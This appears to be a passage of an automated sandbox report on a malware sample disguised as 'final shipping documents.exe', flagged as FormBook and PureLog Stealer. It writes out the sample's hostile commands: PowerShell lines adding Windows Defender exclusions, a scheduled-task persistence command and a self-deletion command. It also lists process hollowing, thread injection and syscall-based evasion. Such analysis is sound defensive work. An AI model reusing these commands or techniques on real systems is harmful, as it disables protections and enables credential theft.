Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A84A35 mov eax, dword ptr fs:[00000030h]	9_2_01A84A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A84A35 mov eax, dword ptr fs:[00000030h]	9_2_01A84A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AECA11 mov eax, dword ptr fs:[00000030h]	9_2_01AECA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9CA6F mov eax, dword ptr fs:[00000030h]	9_2_01A9CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9CA6F mov eax, dword ptr fs:[00000030h]	9_2_01A9CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9CA6F mov eax, dword ptr fs:[00000030h]	9_2_01A9CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0EA60 mov eax, dword ptr fs:[00000030h]	9_2_01B0EA60

Source: C:\Users\user\Desktop\final shipping documents.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\final shipping documents.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 185.199.108.153 80

Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe"
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe"
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe"	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtQueueApcThread: Indirect: 0xBEA4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtClose: Indirect: 0x191A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtQueueApcThread: Indirect: 0x191A4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtClose: Indirect: 0xBEA56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtQueueApcThread: Indirect: 0x2E4A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtClose: Indirect: 0x2E4A56C

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread register set: target process: 4056	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread register set: target process: 4056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread register set: target process: 4056
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 4056
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 8156

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: F70000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 4D0000

Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe"	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpA2.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Source: explorer.exe, 0000000A.00000003.2272841023.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2462443185.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1477935330.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.1477935330.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001A.00000002.2792625509.0000000001199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanARC
Source: explorer.exe, 0000000A.00000000.1477935330.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 0000000A.00000002.2454977385.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1474813999.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000A.00000000.1477935330.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\final shipping documents.exe	Queries volume information: C:\Users\user\Desktop\final shipping documents.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Queries volume information: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\final shipping documents.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: explorer.exe, 0000001A.00000002.3127707798.000000000B17F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: les\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.final shipping documents.exe.30b1678.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.final shipping documents.exe.6fe0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.final shipping documents.exe.6fe0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.GcrdXwPgmZ.exe.2da160c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.GcrdXwPgmZ.exe.2da160c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.final shipping documents.exe.30b1678.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.final shipping documents.exe.2e8f86c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.GcrdXwPgmZ.exe.2b7f800.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1508959820.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1567368332.0000000002A77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1504736152.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

